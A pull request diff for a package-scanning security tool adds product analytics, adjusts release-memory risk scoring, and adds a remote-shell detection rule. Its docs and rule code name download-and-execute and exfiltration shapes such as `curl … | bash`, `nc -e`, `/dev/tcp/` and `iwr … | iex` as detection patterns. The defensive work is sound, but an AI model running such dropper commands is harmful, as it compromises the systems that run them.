### PR TITLE
Fix a shell-dropper detection hole, calibrate risk against prod, restore measurement

### DIFF
--- a/docs/README.md
+++ b/docs/README.md
@@ -35,6 +35,7 @@ The user-facing learning guide is [`../src/pages/Docs/index.tsx`](../src/pages/D
 - [`release-memory.md`](./release-memory.md) — advisory prior-release finding-profile consistency; never changes risk.
 - [`organization-members.md`](./organization-members.md) — organization invitation/membership behavior.
 - [`audit-log.md`](./audit-log.md) — organization audit log surface, visible-event allowlist, and retention.
+- [`product-analytics.md`](./product-analytics.md) — Analytics Engine counters, privacy posture, and the positional event schema.
 - [`two-factor-auth.md`](./two-factor-auth.md) — step-up auth and sensitive actions.
 - [`slack-notifications.md`](./slack-notifications.md) — Slack install and notification flow.
 - [`account-deletion.md`](./account-deletion.md) — account deletion lifecycle.

--- a/docs/README.md
+++ b/docs/README.md
@@ -32,7 +32,7 @@ The user-facing learning guide is [`../src/pages/Docs/index.tsx`](../src/pages/D
 
 - [`security-detection-corpus.md`](./security-detection-corpus.md) — rule/eval fixture layout and expected findings.
 - [`detection-eval.md`](./detection-eval.md) — eval harness, metrics, and gates.
-- [`release-memory.md`](./release-memory.md) — advisory prior-release finding-profile consistency; never changes risk.
+- [`release-memory.md`](./release-memory.md) — advisory prior-release finding-profile consistency; discounts already-approved package context from the artifact-risk headline, and never moves release risk or a gate decision.
 - [`organization-members.md`](./organization-members.md) — organization invitation/membership behavior.
 - [`audit-log.md`](./audit-log.md) — organization audit log surface, visible-event allowlist, and retention.
 - [`product-analytics.md`](./product-analytics.md) — Analytics Engine counters, privacy posture, and the positional event schema.

--- a/docs/audit-log.md
+++ b/docs/audit-log.md
@@ -23,7 +23,12 @@ Scan **lifecycle** churn (`scan.started`, `scan.queued`, `scan.backgrounded`,
 `scan.viewed`) and **discovery** churn (`npm_connection.used`,
 `staged_publishes.scans_started`) are **no longer recorded** — they were ~97% of
 all rows and carried no audit value. Operational visibility for those still lives
-in Workers Logs via `emitOperationalEvent`.
+in Workers Logs via `emitOperationalEvent`, and the _measurable_ part of them —
+volume, latency, failure rate — lives in Analytics Engine via
+`recordProductEvent`. See [`product-analytics.md`](./product-analytics.md):
+Workers Logs is a short-retention debugging stream, so without that counter the
+removal left scan volume and failure rate unanswerable rather than just
+un-audited.
 
 Everything else is still written: `scan.decided`, `github_workflow_gate.*`,
 `npm_connection.{upserted,validated,deleted,token_expired}`, `github_app_*`,

--- a/docs/product-analytics.md
+++ b/docs/product-analytics.md
@@ -60,8 +60,9 @@ organization has the `ai-review` killswitch off — or any deployment without a
 reviewer is invoked and emits nothing. Read the status breakdown as a share of
 attempts; compare against `scan.completed` to get coverage.
 
-**`double1` is not one quantity.** It is request latency for every event except
-`scan.decided`, where it is a human hold time measured in hours. A dataset-wide
+**`double1` is not one quantity.** It is a machine duration in milliseconds for
+every event except `scan.decided`, where it is a human hold time — also in
+milliseconds, but on a scale of hours or days. A dataset-wide
 `quantile(0.95)(double1)` mixes the two; always filter by `blob2` first.
 
 **Ecosystem on `scan.decided` is the decision path, not the registry.** The

--- a/docs/product-analytics.md
+++ b/docs/product-analytics.md
@@ -1,0 +1,143 @@
+# Product analytics
+
+Aggregate counters for the questions that outlive a debugging session: how many
+scans run, how long they take, how often they fail, whether the AI reviewer is
+healthy, whether maintainers agree with the risk grade, and how much traffic the
+public `/diff` surface gets.
+
+Implementation: `server/lib/platform/analytics.ts`. Binding: `PRODUCT_ANALYTICS`
+(Cloudflare Analytics Engine, dataset `drydock_product_events`).
+
+## Why this exists
+
+Scan lifecycle events (`scan.started`, `scan.queued`, `scan.completed`,
+`scan.failed`, `npm_connection.used`, `staged_publishes.scans_started`) used to
+be D1 `scan_events` rows. They were ~97% of that table and carried no audit
+value, so [`audit-log.md`](./audit-log.md) removed them and pointed operational
+visibility at Workers Logs.
+
+That was right for the audit log and wrong for measurement. Workers Logs is a
+short-retention debugging stream: it answers "what happened to this scan an hour
+ago", not "what did scan volume, latency, and failure rate do last month". After
+the change, none of the latter was answerable at all.
+
+Analytics Engine keeps the aggregate without keeping the row. The audit log stays
+lean, and the product stays measurable.
+
+## Privacy
+
+Matching [`security-model.md`](./security-model.md):
+
+- **No PII.** No user ids, emails, IP addresses, user agents, or session data.
+- **No package contents.** No evidence, finding text, file paths, or versions.
+- **Organization ids only on authenticated events.** They are opaque internal
+  identifiers, so per-organization adoption stays answerable without
+  identifying a person.
+- **Public-diff events record only the package name**, which is already public
+  in the request URL, the response cache key, and the page's own Open Graph
+  metadata.
+- **Nothing is written from the browser.** No client script, no beacon
+  endpoint, no cookie — and therefore no new anonymous surface to rate-limit or
+  document. Every event is emitted by the Worker while it is already handling
+  the request that caused it.
+
+`test/analytics.test.mjs` asserts the no-PII property against every event in the
+union, and fails if an arm is added without being exercised — so a new event
+cannot ship without a privacy assertion.
+
+## Known gaps
+
+**No client instrumentation.** In-page interactions are invisible. `/diff`
+view-through is counted; a click on its "Create account" call-to-action is not.
+So the diff → signup conversion **rate** cannot be computed from this data —
+only its numerator (signups) and a view count. Closing that needs a client
+beacon and the public-endpoint review the security model requires for one. Do
+not add one casually.
+
+**`ai_review.finished` counts attempted reviews, not scans.** A scan whose
+organization has the `ai-review` killswitch off — or any deployment without a
+`FLAGS` binding, where the reviewer is off for everything — returns before the
+reviewer is invoked and emits nothing. Read the status breakdown as a share of
+attempts; compare against `scan.completed` to get coverage.
+
+**`double1` is not one quantity.** It is request latency for every event except
+`scan.decided`, where it is a human hold time measured in hours. A dataset-wide
+`quantile(0.95)(double1)` mixes the two; always filter by `blob2` first.
+
+**Ecosystem on `scan.decided` is the decision path, not the registry.** The
+staged-publish route reports `npm`; every gated decision reports `gate`,
+because the gate decision route resolves a package scan rather than an adapter.
+
+## Schema
+
+Analytics Engine columns are **positional** (`blob1`, `double1`, …), not named,
+so reordering silently rewrites the meaning of every historical query. Positions
+are fixed per `ANALYTICS_SCHEMA_VERSION`; bump it rather than shifting a field.
+
+| slot       | meaning                                          |
+| ---------- | ------------------------------------------------ |
+| `index1`   | event name — the sampling key                    |
+| `blob1`    | schema version                                   |
+| `blob2`    | event name (repeated so queries need only blobs) |
+| `blob3`    | organization id, or `""` for anonymous events    |
+| `blob4`    | ecosystem                                        |
+| `blob5–8`  | event-specific dimensions, in declaration order  |
+| `double1`  | duration in ms (0 when not applicable)           |
+| `double2+` | event-specific counts                            |
+
+The event name is the sampling index so a high-volume event can never starve a
+low-volume one out of the dataset.
+
+## Events
+
+| event                      | emitted from                  | answers                                    |
+| -------------------------- | ----------------------------- | ------------------------------------------ |
+| `scan.queued`              | `POST /api/v1/scans`          | queued → completed drop-off                |
+| `scan.completed`           | `recordCompletion`            | volume, latency, risk mix, finding counts  |
+| `scan.failed`              | `executeScanJob`, gate runner | failure rate by error code                 |
+| `scan.decided`             | both decision paths           | time-to-decision; agreement with the grade |
+| `ai_review.finished`       | `maybeRunAiReview`            | reviewer health — the silent-failure rate  |
+| `npm_connection.validated` | npm connection validation     | onboarding funnel                          |
+| `public_diff.viewed`       | `loadRequestedDiff`           | growth-loop traffic, cache hit rate        |
+
+`scan.failed` fires only on a terminal failure, so a scan that succeeds on retry
+is not filed as a failure. Both the npm queue path and the workflow-gate runner
+emit it — counting completions from every ecosystem while counting failures from
+only one would bias the derived failure rate low for exactly the ecosystems that
+release solely through a gate.
+
+`public_diff.viewed` fires for the version-pair request only. `/file` funnels
+through the same loader and is called once per file the visitor opens, so
+counting it would report one page view as thirty and skew the cache column
+toward `hit` (only the first request of a session can miss).
+
+`ai_review.finished` is the highest-value counter here. A review that returns
+`invalid`/`unavailable` is handled safely — `computeScanRisk` floors the scan at
+medium and `displayedAiResult` refuses to render it as "low risk / nothing
+unusual" — but it is otherwise completely silent. Counting the status makes the
+reviewer's failure rate a number instead of a thing nobody sees.
+
+## Reading the data
+
+Analytics Engine is queried through the Cloudflare SQL API:
+
+```sh
+curl "https://api.cloudflare.com/client/v4/accounts/$CF_ACCOUNT_ID/analytics_engine/sql" \
+  -H "Authorization: Bearer $CF_API_TOKEN" \
+  -d "SELECT blob2 AS event, count() AS n
+      FROM drydock_product_events
+      WHERE timestamp > now() - INTERVAL '7' DAY
+      GROUP BY event ORDER BY n DESC"
+```
+
+Sampling: Analytics Engine samples under load and exposes `_sample_interval`.
+Multiply by it (`SUM(_sample_interval)`) for counts, rather than using
+`count()`, once volume is high enough for sampling to engage.
+
+## Optional binding
+
+The binding is optional everywhere. `recordProductEvent` returns immediately
+when it is absent, and a write failure degrades to a `analytics.write_failed`
+warn log — analytics is the least important thing happening in any request that
+emits one. Local dev, the test suite, and self-hosted deployments that omit the
+block in `wrangler.template.jsonc` behave exactly as they did before.

--- a/docs/release-memory.md
+++ b/docs/release-memory.md
@@ -9,8 +9,8 @@ presents those findings as if they were novel.
 
 ## What it does
 
-During a scan, after deterministic findings and risk are computed, the
-pipeline looks up the most recent scan in the **same organization**, for the
+During a scan, after deterministic findings are computed and before they are
+scored, the pipeline looks up the most recent scan in the **same organization**, for the
 **same `packageName`**, with `status = 'complete'` and `decision = 'publish'`
 (the in-flight scan id is excluded). Both scans are reduced to a **finding
 profile**: the multiset of `(ruleId, severity, file)` over rule findings.
@@ -37,13 +37,42 @@ the profile matches, is a subset of, or has diverged from the prior approved
 release. This keeps recurring package-context findings from arriving as an
 unexplained high-risk alert while preserving the recorded risk and findings.
 
-## It never changes risk
+## What it changes, and what it must not
 
-Release memory is **advisory display context only**. It does not modify
-`risk`, the risk breakdown, or any finding — deterministic findings stay
-authoritative, exactly like the AI reviewer cannot downgrade them. The UI
-renders it as a positive banner (`match`/`subset`) or a quiet "N findings are
-new since the last approved release" line (`diverged`) next to the
+Release memory has exactly one scoring effect: **package-context findings that
+were already in an approved release stop anchoring `contextRisk` and
+`artifactRisk`.** It never edits, hides, or re-severities a finding — every one
+is still emitted, persisted, and listed in the UI. Only its contribution to the
+headline score is dropped, and `priorApprovedContextFindingCount` on the risk
+breakdown records how many were dropped so the banner can say so. A headline
+that silently falls from high to low is worse than one that never moved.
+
+The boundaries are what make this safe:
+
+- **Release-delta findings are never demoted.** A finding on a file this
+  release changed says something about new bytes, so matching a prior profile
+  entry proves nothing about it. `releaseRisk` is therefore untouched, and
+  because `workflow-gate-job.ts` reads `releaseRisk` for its accept/reject
+  recommendation, a prior approval can never release a held GitHub job.
+- **It cannot escalate.** The adjustment only ever removes findings from a
+  score; it has no path to raise one.
+- **It fails closed.** No prior approved scan, or a `diverged` profile whose
+  `newFindings` list hit the 25-entry cap (so the approved set can't be
+  reconstructed exactly), drops nothing at all.
+- **AI output can't reach it, in either direction.** The profile is
+  deterministic-only, so the advisory reviewer cannot influence what counts as
+  previously approved — and, symmetrically, an AI finding is never dropped by
+  the adjustment, because a `match` on the deterministic profile says nothing
+  about what the reviewer found. AI findings are projected without a `ruleId`,
+  which is what makes them ineligible.
+
+The motivating evidence is production: across scans whose release delta was
+clean but whose package context read high, **every single one was published
+anyway.** Re-anchoring a headline on evidence a maintainer already accepted is
+how a real signal ends up buried.
+
+The UI renders it as a positive banner (`match`/`subset`) or a quiet "N findings
+are new since the last approved release" line (`diverged`) next to the
 recommendation; `none` renders nothing.
 
 A `match`/`subset` with **zero current findings** is a vacuous comparison

--- a/docs/release-memory.md
+++ b/docs/release-memory.md
@@ -59,6 +59,15 @@ The boundaries are what make this safe:
 - **It fails closed.** No prior approved scan, or a `diverged` profile whose
   `newFindings` list hit the 25-entry cap (so the approved set can't be
   reconstructed exactly), drops nothing at all.
+- **A skipped baseline disables it entirely.** When the published baseline
+  exceeded the download budget (`BaselineInfo.comparisonSkipped`), every finding
+  is annotated `unknown` package context, so the whole scan would otherwise land
+  in the adjustment's bucket. Release memory's premise is "this evidence was
+  reviewed before _and nothing changed_"; with nothing compared, the second half
+  cannot be established, and a profile match on
+  `(ruleId, severity, file)` does not imply identical bytes. Discounting there
+  would grade an uncompared release as clean — the failure the skipped-baseline
+  handling exists to prevent.
 - **AI output can't reach it, in either direction.** The profile is
   deterministic-only, so the advisory reviewer cannot influence what counts as
   previously approved — and, symmetrically, an AI finding is never dropped by

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -238,6 +238,34 @@ their holes, so changing `^1.0.0 || ^3.0.0` to `^2.0.0` also fires. A pure narro
 (`>=1.0.0` → `^1.0.0`) stays inside the reviewed intervals and raises nothing, and
 a no-op `|| ` suffix or an unparseable leading branch cannot suppress the comparison. Upper-only
 comparator ranges such as `<=1.9.9` implicitly start at major 0 and participate in the same check.
+`1.19.0` splits `code.remote-shell` out of `code.process-execution` and fixes two roll-up defects it
+exposed. The capability rules matched the language-level call that _starts_ a subprocess
+(`child_process`, `execSync`, `spawn(`) in the same set as the shell _command_ handed to it
+(`curl`, `wget`, `nc`), so `execSync('curl … | bash')` scored as a single `code.process-execution` —
+the weak-on-its-own capability — and de-escalated the whole release to `low`, which made the workflow
+gate recommend approve. Neither network rule could see it either: both model in-language APIs, and a
+shell-mediated download never touches one. Shell commands that reach the network
+(`curl`/`wget`/`nc`/`netcat`/`/dev/tcp/`/`Invoke-WebRequest`/`DownloadString`) now raise
+`code.remote-shell` at high, and the download-and-execute compositions — a fetch piped or
+command-substituted into an interpreter (`curl … | bash`, `$(curl …)`, `<(wget …)`), `nc -e`,
+`powershell -enc`, `iwr … | iex` — raise it at critical, since no benign release fetches and runs code
+it did not ship. A bare shell tool additionally requires an executor in reach — a spawn API in the
+same file, or a lifecycle hook pointing at it — because the patterns match a command _string_ and
+comments are not stripped before matching, so the most common way an API client documents itself
+(`// equivalent to: curl -X POST …`) would otherwise read as a high-severity capability
+(`legit-curl-in-doc-comment` benign hard-negative). Download-and-execute is exempt from that
+requirement: `curl … | bash` has no benign reading even as an instruction. The rule is excluded from the weak-lone de-escalation and counts as an egress sink for
+the same-file credential→network chain, so a token read paired with `curl` is the collect-and-exfiltrate
+shape it always was (`shell-download-execute-dropper` and `shell-credential-exfil` golden cases).
+Inline interpreters with no network tool (`bash -c`, `sh -c`, `powershell`, `cmd /c`) deliberately stay
+inside `code.process-execution`, where a lone capability still de-escalates — ordinary build tooling
+runs make targets through a shell (`legit-shell-interpreter-build` benign hard-negative) — and that set
+gained `sh`/`zsh`/`ksh`/`dash -c`, `pwsh`, and `cmd /c`, which were previously unmodeled. Because
+command strings are language-agnostic, both the JavaScript and Python pattern sets share them, and
+`PYTHON_EXECUTION_CAPABILITY_PATTERNS` picks them up so a `setup.py` that shells out to `curl` counts
+as install-time execution. Separately, the co-occurrence branch of `computeRisk` returned a flat
+`high`, which meant a second capability could _de_-escalate a critical one; co-occurrence is now a
+floor combined with the highest capability severity, never a ceiling.
 An empty spec is treated
 like `*` rather than skipped, and `workspace:`/`catalog:`/`link:`/`portal:` protocols join
 `git:`/`https:`/`file:`/`npm:` as unusual specs (they name no published package). Spec parsing lives in

--- a/server/db/scans.ts
+++ b/server/db/scans.ts
@@ -13,6 +13,7 @@ import {
   type PackageJsonSummary,
 } from "../lib/review";
 import { normalizeScanRiskBreakdown, type ScanRiskBreakdown } from "../lib/review/risk";
+import { recordProductEvent } from "../lib/platform/analytics";
 import {
   deleteScanArtifacts,
   loadScanArtifactFile,
@@ -718,6 +719,10 @@ function computeRiskSummary(
     releaseFindingCount: persistedBreakdown?.releaseFindingCount ?? releaseFindings.length,
     contextFindingCount: persistedBreakdown?.contextFindingCount ?? contextFindings.length,
     unknownFindingCount: persistedBreakdown?.unknownFindingCount ?? unknownFindingCount,
+    // Recomputation can't reconstruct which context findings a prior release
+    // already covered — that needs the release-memory lookup — so an unset value
+    // means "no adjustment", matching how scans written before the field scored.
+    priorApprovedContextFindingCount: persistedBreakdown?.priorApprovedContextFindingCount ?? 0,
   };
 }
 
@@ -741,6 +746,10 @@ function readPersistedListRiskSummary(summaryJson: unknown): ScanRiskBreakdown |
     releaseFindingCount: partial.releaseFindingCount,
     contextFindingCount: partial.contextFindingCount,
     unknownFindingCount: partial.unknownFindingCount,
+    // Deliberately not part of the completeness guard above: scans persisted
+    // before release memory affected scoring have no such field, and requiring
+    // it would drop every one of them back to the recompute path.
+    priorApprovedContextFindingCount: partial.priorApprovedContextFindingCount ?? 0,
   };
 }
 
@@ -756,6 +765,7 @@ export async function recordScanDecision(
   db: AppDb,
   input: RecordScanDecisionInput,
   artifactBucket?: R2Bucket,
+  env?: Cloudflare.Env,
 ) {
   const now = new Date();
   const reason = input.reason?.trim() ? input.reason.trim() : null;
@@ -775,7 +785,12 @@ export async function recordScanDecision(
         eq(scans.status, "complete"),
       ),
     )
-    .returning({ id: scans.id });
+    .returning({
+      id: scans.id,
+      createdAt: scans.createdAt,
+      risk: scans.risk,
+      riskSummaryJson: scans.riskSummaryJson,
+    });
 
   if (updated.length === 0) return null;
 
@@ -787,7 +802,35 @@ export async function recordScanDecision(
     metadata: { decision: input.decision, reason },
   });
 
+  // Always npm here: this is the staged-publish decision route. Gated releases
+  // decide through `recordGatePackageDecision` below and report `gate`.
+  recordDecisionEvent(env, updated[0], {
+    organizationId: input.organizationId,
+    decision: input.decision,
+    ecosystem: "npm",
+    now,
+  });
+
   return getScan(db, input.scanId, input.organizationId, artifactBucket);
+}
+
+function toEpochMs(value: Date | number | string | null): number {
+  if (value instanceof Date) return value.getTime();
+  if (typeof value === "number") return value;
+  if (typeof value === "string") {
+    const parsed = Date.parse(value);
+    return Number.isNaN(parsed) ? Date.now() : parsed;
+  }
+  return Date.now();
+}
+
+function readRiskSummaryValue(value: unknown): unknown {
+  if (typeof value !== "string") return value;
+  try {
+    return JSON.parse(value);
+  } catch {
+    return null;
+  }
 }
 
 export interface RecordGatePackageDecisionInput extends RecordScanDecisionInput {
@@ -803,6 +846,7 @@ export async function recordGatePackageDecision(
   db: AppDb,
   input: RecordGatePackageDecisionInput,
   artifactBucket?: R2Bucket,
+  env?: Cloudflare.Env,
 ) {
   const now = new Date();
   const reason = input.reason?.trim() ? input.reason.trim() : null;
@@ -831,7 +875,12 @@ export async function recordGatePackageDecision(
         )`,
       ),
     )
-    .returning({ id: scans.id });
+    .returning({
+      id: scans.id,
+      createdAt: scans.createdAt,
+      risk: scans.risk,
+      riskSummaryJson: scans.riskSummaryJson,
+    });
 
   if (updated.length === 0) return null;
 
@@ -843,7 +892,40 @@ export async function recordGatePackageDecision(
     metadata: { decision: input.decision, reason },
   });
 
+  // Gated releases decide here rather than through `recordScanDecision`, so
+  // without this the decision counter saw only the npm staged path — the
+  // ecosystems that release exclusively through a gate were invisible.
+  recordDecisionEvent(env, updated[0], {
+    organizationId: input.organizationId,
+    decision: input.decision,
+    ecosystem: "gate",
+    now,
+  });
+
   return getScan(db, input.scanId, input.organizationId, artifactBucket);
+}
+
+/**
+ * Shared product counter for both decision paths. Time-to-decision is the one
+ * number that says how long a release actually sits held, and the decision-vs-
+ * risk split is the clearest available signal that a risk grade is
+ * miscalibrated — so both paths have to report it the same way.
+ */
+function recordDecisionEvent(
+  env: Cloudflare.Env | undefined,
+  row: { createdAt: Date | number | string | null; risk: string; riskSummaryJson: unknown },
+  input: { organizationId: string; decision: string; ecosystem: string; now: Date },
+): void {
+  const breakdown = normalizeScanRiskBreakdown(readRiskSummaryValue(row.riskSummaryJson));
+  recordProductEvent(env, {
+    name: "scan.decided",
+    organizationId: input.organizationId,
+    ecosystem: input.ecosystem,
+    decision: input.decision,
+    releaseRisk: breakdown?.releaseRisk ?? row.risk,
+    artifactRisk: breakdown?.artifactRisk ?? row.risk,
+    timeToDecisionMs: Math.max(0, input.now.getTime() - toEpochMs(row.createdAt)),
+  });
 }
 
 export async function getScan(

--- a/server/env.d.ts
+++ b/server/env.d.ts
@@ -9,6 +9,11 @@ declare global {
       ARTIFACTS?: R2Bucket;
       SCAN_ARTIFACT_READS_DISABLED?: string;
       COMPARE_CACHE?: KVNamespace;
+      // Aggregate product counters. Optional: every call site is a no-op
+      // without it, so local dev, tests, and self-hosted deployments that omit
+      // the binding behave exactly as before. See
+      // server/lib/platform/analytics.ts.
+      PRODUCT_ANALYTICS?: AnalyticsEngineDataset;
       SCAN_QUEUE?: Queue<import("./lib/scan/job").QueueMessage>;
       NPM_REGISTRY: string;
       ALLOW_INSECURE_LOCAL_REGISTRY?: string;

--- a/server/lib/ecosystems/npm/staged-publishes-discovery.ts
+++ b/server/lib/ecosystems/npm/staged-publishes-discovery.ts
@@ -10,6 +10,7 @@ import {
 import { decryptNpmToken, validateNpmCredential, type NpmCredentialValidation } from "./connection";
 import { notifyNpmConnectionExpired } from "../../notify";
 import { executeScanJob, type ScanQueueMessage } from "../../scan/job";
+import { recordProductEvent } from "../../platform/analytics";
 import {
   checkStagedPublishAccess,
   listStagedPublishes,
@@ -257,6 +258,12 @@ export async function discoverAndQueueStagedPublishes(
           stagedVersion: item.version,
         });
         if (!detail) return null;
+        recordProductEvent(env, {
+          name: "scan.queued",
+          organizationId,
+          ecosystem: "npm",
+          source,
+        });
         const startedScan: StartedStagedPublishScan = {
           id: scanId,
           stageId,

--- a/server/lib/ecosystems/vscode/findings.ts
+++ b/server/lib/ecosystems/vscode/findings.ts
@@ -185,7 +185,14 @@ function startupRemoteCommandFinding(
     if (!reachable.textSample) continue;
     const sample = reachable.textSample;
     const normalized = normalizeCodeForScanning(sample);
-    const processExecution = matches(JS_PATTERN_SET.processExecution, sample, normalized);
+    // `remoteShell` is part of the execution leg, not an extra requirement:
+    // `curl`/`wget`/`nc` used to live in `processExecution` and moved out with
+    // the rules 1.19.0 split. Without it, an extension whose shell evidence is
+    // `terminal.sendText("curl … | sh")` stopped satisfying this conjunction
+    // and lost its critical finding.
+    const processExecution =
+      matches(JS_PATTERN_SET.processExecution, sample, normalized) ||
+      matches(JS_PATTERN_SET.remoteShell, sample, normalized);
     const networkAccess = matches(JS_PATTERN_SET.networkAccess, sample, normalized);
     const dynamicEvaluation = matches(JS_PATTERN_SET.dynamicEvaluation, sample, normalized);
     if (!processExecution || !networkAccess || !dynamicEvaluation) continue;
@@ -194,6 +201,7 @@ function startupRemoteCommandFinding(
       file: reachable.path,
       line: firstMatchingLine(sample, [
         ...JS_PATTERN_SET.processExecution,
+        ...JS_PATTERN_SET.remoteShell,
         ...JS_PATTERN_SET.networkAccess,
         ...JS_PATTERN_SET.dynamicEvaluation,
       ]),

--- a/server/lib/platform/analytics.ts
+++ b/server/lib/platform/analytics.ts
@@ -64,6 +64,23 @@ export type AnalyticsEvent =
       durationMs: number;
     }
   | {
+      /**
+       * A queued scan retired without ever running: currently only an
+       * auto-discovered staged publish whose tarball vanished before the job
+       * claimed it (npm unpublished or replaced the candidate). Separate from
+       * `scan.failed` on purpose — folding a routine race into the failure rate
+       * would make the reviewer's real failure rate unreadable — but still a
+       * terminal event, so every `scan.queued` has exactly one counterpart.
+       */
+      name: "scan.discarded";
+      organizationId: string;
+      ecosystem: string;
+      source: string;
+      /** Stable reason slug, never a raw message. */
+      reason: string;
+      durationMs: number;
+    }
+  | {
       name: "scan.decided";
       organizationId: string;
       ecosystem: string;
@@ -173,6 +190,13 @@ function toDataPoint(event: AnalyticsEvent): AnalyticsEngineDataPoint {
         event.organizationId,
         event.ecosystem,
         [event.source, event.code],
+        [event.durationMs],
+      );
+    case "scan.discarded":
+      return base(
+        event.organizationId,
+        event.ecosystem,
+        [event.source, event.reason],
         [event.durationMs],
       );
     case "scan.decided":

--- a/server/lib/platform/analytics.ts
+++ b/server/lib/platform/analytics.ts
@@ -1,0 +1,202 @@
+// Product analytics: queryable counters for the questions Workers Logs cannot
+// answer after its retention window closes.
+//
+// Why this exists. Scan lifecycle events (`scan.queued`/`started`/`completed`)
+// used to be D1 `scan_events` rows. They were ~97% of that table and carried no
+// audit value, so they were correctly removed (docs/audit-log.md) and pointed at
+// Workers Logs — but Workers Logs is a short-retention debugging stream, not a
+// historical store, so scan volume, latency, failure rate, and AI-reviewer
+// health stopped being measurable at all. Analytics Engine is the replacement:
+// it keeps the aggregate without keeping the row.
+//
+// Privacy posture, matching docs/security-model.md:
+//   - No PII. No user ids, emails, IP addresses, user agents, or session data.
+//   - No package contents, evidence, findings text, file paths, or versions.
+//   - Organization ids are opaque internal identifiers and appear only on
+//     authenticated events, so per-organization adoption stays answerable
+//     without identifying a person.
+//   - Public-diff events record only the package name, which is already public
+//     data in the request URL, the response cache key, and the page's own
+//     Open Graph metadata.
+//   - Nothing is written from the browser. There is no client script, no
+//     beacon endpoint, no cookie, and therefore no new anonymous surface to
+//     rate-limit. Every event below is emitted by the Worker while it is
+//     already handling the request that caused it.
+//
+// Known gap, deliberately: because there is no client instrumentation, in-page
+// interactions are invisible. `/diff` view-through is counted, but a click on
+// its "Create account" call-to-action is not, so the diff → signup conversion
+// rate cannot be computed from this data alone — only its numerator (signups)
+// and a view count. Closing that needs a client beacon and the public-endpoint
+// review the security model requires for one.
+
+import { emitOperationalEvent } from "./observability";
+
+/** Bump when blob/double positions change meaning; queries key off it. */
+export const ANALYTICS_SCHEMA_VERSION = "1";
+
+export type AnalyticsEvent =
+  | {
+      name: "scan.queued";
+      organizationId: string;
+      ecosystem: string;
+      source: string;
+    }
+  | {
+      name: "scan.completed";
+      organizationId: string;
+      ecosystem: string;
+      source: string;
+      releaseRisk: string;
+      artifactRisk: string;
+      contextRisk: string;
+      durationMs: number;
+      ruleFindingCount: number;
+      aiFindingCount: number;
+    }
+  | {
+      name: "scan.failed";
+      organizationId: string;
+      ecosystem: string;
+      source: string;
+      /** Stable failure slug (e.g. `staged_tarball_unavailable`), never a raw message. */
+      code: string;
+      durationMs: number;
+    }
+  | {
+      name: "scan.decided";
+      organizationId: string;
+      ecosystem: string;
+      decision: string;
+      releaseRisk: string;
+      artifactRisk: string;
+      /** Time from scan creation to the maintainer's decision. */
+      timeToDecisionMs: number;
+    }
+  | {
+      name: "ai_review.finished";
+      organizationId: string;
+      ecosystem: string;
+      /**
+       * `complete` | `invalid` | `unavailable` | `errored` — the silent-failure
+       * rate. `errored` is this layer's own value for a review that threw; the
+       * other three come from `AiReviewStatus`.
+       *
+       * Note the denominator: a scan whose organization has the `ai-review`
+       * killswitch off (or that runs without a `FLAGS` binding at all) returns
+       * before the reviewer is invoked and emits nothing here, so this counts
+       * attempted reviews, not scans.
+       */
+      status: string;
+      model: string;
+      durationMs: number;
+      findingCount: number;
+    }
+  | {
+      name: "npm_connection.validated";
+      organizationId: string;
+      /** `ok` | `failed` */
+      outcome: string;
+    }
+  | {
+      name: "public_diff.viewed";
+      ecosystem: string;
+      /** Public package/project name — already public in the URL and cache key. */
+      packageName: string;
+      /** `hit` | `miss` — how much of this traffic the caches absorb. */
+      cache: string;
+      risk: string;
+      durationMs: number;
+    };
+
+/**
+ * Write one product event. Never throws and never blocks the caller's result:
+ * analytics is the least important thing happening in any request that emits
+ * one, so a missing binding (local dev, tests) or a write failure degrades to a
+ * warn log and nothing else.
+ */
+export function recordProductEvent(
+  env: Pick<Cloudflare.Env, "PRODUCT_ANALYTICS"> | undefined,
+  event: AnalyticsEvent,
+): void {
+  const dataset = env?.PRODUCT_ANALYTICS;
+  if (!dataset) return;
+  try {
+    dataset.writeDataPoint(toDataPoint(event));
+  } catch (err) {
+    emitOperationalEvent("warn", "analytics.write_failed", {
+      event: event.name,
+      error: err instanceof Error ? err.name : typeof err,
+    });
+  }
+}
+
+/**
+ * Blob and double positions are fixed by schema version, because Analytics
+ * Engine columns are positional (`blob1`, `double1`, …) rather than named — a
+ * reordering silently rewrites the meaning of every historical query.
+ *
+ * indexes: [name]        — the sampling key, so a high-volume event can never
+ *                          starve a low-volume one out of the dataset.
+ * blob1:   schema version
+ * blob2:   event name (also in the index; repeated so queries need only blobs)
+ * blob3:   organization id, or "" for anonymous events
+ * blob4:   ecosystem
+ * blob5–8: event-specific dimensions, in the order declared per event below
+ * double1: duration in ms (0 when not applicable)
+ * double2–4: event-specific counts
+ */
+function toDataPoint(event: AnalyticsEvent): AnalyticsEngineDataPoint {
+  const base = (
+    organizationId: string,
+    ecosystem: string,
+    blobs: string[],
+    doubles: number[],
+  ): AnalyticsEngineDataPoint => ({
+    indexes: [event.name],
+    blobs: [ANALYTICS_SCHEMA_VERSION, event.name, organizationId, ecosystem, ...blobs],
+    doubles,
+  });
+
+  switch (event.name) {
+    case "scan.queued":
+      return base(event.organizationId, event.ecosystem, [event.source], [0]);
+    case "scan.completed":
+      return base(
+        event.organizationId,
+        event.ecosystem,
+        [event.source, event.releaseRisk, event.artifactRisk, event.contextRisk],
+        [event.durationMs, event.ruleFindingCount, event.aiFindingCount],
+      );
+    case "scan.failed":
+      return base(
+        event.organizationId,
+        event.ecosystem,
+        [event.source, event.code],
+        [event.durationMs],
+      );
+    case "scan.decided":
+      return base(
+        event.organizationId,
+        event.ecosystem,
+        [event.decision, event.releaseRisk, event.artifactRisk],
+        [event.timeToDecisionMs],
+      );
+    case "ai_review.finished":
+      return base(
+        event.organizationId,
+        event.ecosystem,
+        [event.status, event.model],
+        [event.durationMs, event.findingCount],
+      );
+    case "npm_connection.validated":
+      return base(event.organizationId, "npm", [event.outcome], [0]);
+    case "public_diff.viewed":
+      return base(
+        "",
+        event.ecosystem,
+        [event.packageName, event.cache, event.risk],
+        [event.durationMs],
+      );
+  }
+}

--- a/server/lib/platform/text-utils.ts
+++ b/server/lib/platform/text-utils.ts
@@ -13,6 +13,50 @@ export function firstMatchingLine(
   return undefined;
 }
 
+// Comment-only source lines, in both the JS (`//`, `/* … */`, leading `*` of a
+// block continuation) and Python/shell (`#`) flavors. A line that merely *ends*
+// in a comment still counts as code — only lines whose entire content is a
+// comment are skipped.
+const LINE_COMMENT_START = /^\s*(?:\/\/|#|\*(?!\/)|\/\*|\*\/)/;
+const BLOCK_COMMENT_OPEN = /\/\*(?![\s\S]*?\*\/)/;
